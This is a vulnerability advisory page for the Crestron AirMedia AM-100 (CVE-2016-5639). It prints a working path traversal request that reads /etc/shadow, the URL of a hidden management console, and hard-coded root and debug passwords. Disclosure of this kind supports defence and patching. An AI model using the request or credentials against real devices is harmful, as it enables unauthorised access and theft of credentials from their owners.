Crestron AM-100 1.2.1 Path Traversal / Hard-Coded Credentials

2016.11.23
Credit: Zach Lanier
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

================================================================= # Crestron AM-100 (Multiple Vulnerabilities) ================================================================= # Date: 2016-08-01 # Exploit Author: Zach Lanier # Vendor Homepage: https://www.crestron.com/products/model/am-100 # Version: v1.1.1.11 - v1.2.1 # CVE: CVE-2016-5639 # References: # https://medium.com/@benichmt1/an-unwanted-wireless-guest-9433383b1673#.78tu9divi # https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md Description: The Crestron AirMedia AM-100 with firmware versions v1.1.1.11 - v1.2.1 is vulnerable to multiple issues. 1) Path Traversal GET request: http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow 2) Hidden Management Console http://[AM-100-ADDRESS]/cgi-bin/login_rdtool.cgi The AM-100 has a hardcoded default credential of rdtool::mistral5885 This interface contains the ability to upload arbitrary files (RD upload) and can enable a telnet server that runs on port 5885 (RD Debug mode). 3) Hardcoded credentials The default root password for these devices is root::awind5885 Valid login sessions for the default (non-debugging) management interface are stored on the filesystem as session01, session02.. etc. Cleartext credentials can be read directly from these files.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top